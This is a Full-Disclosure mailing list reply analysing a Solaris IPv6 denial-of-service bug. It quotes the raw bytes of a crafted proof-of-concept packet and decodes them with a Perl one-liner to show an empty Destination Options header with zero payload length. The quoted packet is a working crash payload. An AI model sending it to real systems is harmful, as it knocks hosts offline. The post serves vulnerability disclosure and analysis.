Re: Solaris IPv6 DoS vulnerabilities (was: Solaris Devs Are Smoking Pot)

[GomoR <fd () gomor org>]

On Mon, Jan 26, 2009 at 08:23:45AM +0100, Kingcope Kingcope wrote:
[..]
> unsigned char rawData[] =
> "\x60\xfc\x57\x29\x00\x00\x3c\x56\x6f\x35\x40\x72\x70\x2f\x52\x58"
> "\xcc\x95\x12\x79\x30\xbb\xbe\x25\xfe\x80\x00\x00\x00\x00\x00\x00"
> "\x02\x0c\x29\xff\xfe\xf1\x1e\xbb";
[..]

% perl -MNet::Frame::Simple -e 'print Net::Frame::Simple->new(raw => 
"\x60\xfc\x57\x29\x00\x00\x3c\x56\x6f\x35\x40\x72\x70\x2f\x52\x58\xcc\x95\x12\x79\x30\xbb\xbe\x25\xfe\x80\x00\x00\x00\x00\x00\x00\x02\x0c\x29\xff\xfe\xf1\x1e\xbb",firstLayer
 => 'IPv6')->print."\n"'
Unable to unpack next layer, not yet implemented in layer: 0:IPv6
IPv6: version:6  trafficClass:0x0f  flowLabel:0xc5729  nextHeader:0x3c
IPv6: payloadLength:0  hopLimit:86
IPv6: src:6f35:4072:702f:5258:cc95:1279:30bb:be25  dst:fe80::20c:29ff:fef1:1ebb

So this vulnerability is due to an implementation flaw in the 
parsing of IPv6 Destination Header (0x3c). Of course, there is 
no IPv6 DH to parse :)

This vulnerability only exists when setting next header to 0x3c 
or does it work with other values ?

My guess is that we have a more general issue here.

-- 
  ^  ___  ___             http://www.GomoR.org/          <-+
  | / __ |__/               Research Engineer              |
  | \__/ |  \     ---[ zsh$ alias psed='perl -pe ' ]---    |
  +-->  Net::Frame <=> http://search.cpan.org/~gomor/  <---+

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/